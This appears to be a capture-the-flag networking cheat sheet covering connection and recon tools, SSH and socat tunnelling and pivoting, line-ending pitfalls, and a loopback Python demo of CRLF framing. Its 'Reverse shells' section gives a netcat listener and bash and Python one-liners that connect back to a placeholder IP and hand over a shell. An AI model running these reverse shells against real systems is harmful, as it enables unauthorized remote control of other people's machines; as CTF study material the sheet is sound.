networking::ctf

networking · TCP · UDP · pivoting · tunnels
Connectivity, Tunnels & Shells

01 Connectivity & Recon
Basic tools
nc host port                        # raw TCP connection
ncat --ssl host 443                 # TCP wrapped in TLS
curl -i URL                         # HTTP request, response headers included
openssl s_client -connect host:443  # TLS handshake plus certificate details
dig @dnsserver name                 # DNS query against a specific server
nmap -sC -sV host                   # default scripts plus service/version detection
Useful questions
Question                  Impact
plain TCP or TLS?         use nc vs. ncat/openssl
line-oriented protocol?   send a newline and watch for prompts
HTTP-ish?                 try curl before a browser
UDP?                      use nc -u or socat
02 Tunnels / Forwarding / Pivoting
SSH forwarding
ssh -L 8080:127.0.0.1:80 user@jump    # local: local 8080 -> port 80 as seen from jump
ssh -R 9001:127.0.0.1:9001 user@jump  # remote: port 9001 on jump -> local 9001
ssh -D 1080 user@jump                 # dynamic: SOCKS proxy on local 1080
Socat / relays
socat TCP-LISTEN:4444,reuseaddr,fork TCP:target:80  # relay: local 4444 -> target:80, one fork per client
socat file:`tty`,raw,echo=0 TCP:host:port           # handy for interactive raw services
Reverse shells
nc -lvnp 4444
bash -c 'bash -i >& /dev/tcp/IP/4444 0>&1'
python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("IP",4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
Pitfalls
Issue                        Fix
copy/paste CRLF issues       the protocol may require exact line endings (\r\n vs \n)
wrong bind address           127.0.0.1 (local only) vs 0.0.0.0 (all interfaces) matters
TLS hidden behind TCP port   openssl s_client reveals it
proxy environment            curl honours proxy env vars (http_proxy etc.); nc does not
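The "line-oriented protocol? send a newline and watch for prompts" entry in 01 and the copy/paste CRLF pitfall above, as an added example that is not part of the original page: a constructed prompt-driven toy service on 127.0.0.1 that insists on CRLF framing is probed once with a bare LF and once with CRLF, showing the silence and the glued-together line that result. `toy_service`, `recv_until`, `probe_line_endings` and `run_demo` are hypothetical names.

```python
import socket
import threading
PROMPT, CRLF = b"> ", b"\r\n"   # prompt and the line terminator the toy service insists on

def toy_service(listener: socket.socket) -> None:
    # Constructed service, strict CRLF framing: prompt, wait for a full CRLF line, answer, repeat.
    conn, _ = listener.accept()
    with conn:
        buf = b""
        conn.sendall(b"220 toy ready" + CRLF + PROMPT)
        while chunk := conn.recv(1024):
            buf += chunk
            while CRLF in buf:                      # a bare '\n' never completes a line
                line, buf = buf.split(CRLF, 1)
                if line == b"QUIT":
                    conn.sendall(b"221 bye" + CRLF)
                    return
                conn.sendall(b"250 got " + line + CRLF + PROMPT)

def recv_until(conn: socket.socket, marker: bytes, timeout: float = 0.5) -> bytes:
    # Read until the prompt marker appears or the peer stays quiet for `timeout` seconds.
    conn.settimeout(timeout)
    data = b""
    while not data.endswith(marker):
        try:
            chunk = conn.recv(1024)
        except socket.timeout:
            break
        if not chunk:
            break
        data += chunk
    return data

def probe_line_endings(port: int) -> dict:
    results = {}
    with socket.create_connection(("127.0.0.1", port)) as c:
        results["banner"] = recv_until(c, PROMPT)
        c.sendall(b"HELO\n")                     # bare LF, as a terminal paste often sends
        results["lf"] = recv_until(c, PROMPT)    # service still waits for CRLF: silence
        c.sendall(b"HELO" + CRLF)                # exact CRLF completes the line, but the
        results["crlf"] = recv_until(c, PROMPT)  # stray "HELO\n" is now glued onto it
        c.sendall(b"QUIT" + CRLF)
    return results

def run_demo() -> dict:
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))  # loopback only, cf. the bind-address pitfall
    listener.listen(1)
    threading.Thread(target=toy_service, args=(listener,), daemon=True).start()
    return probe_line_endings(listener.getsockname()[1])
```

`run_demo()` returns the banner, the empty reply to the LF-terminated command, and the CRLF reply that carries the earlier unterminated input inside it.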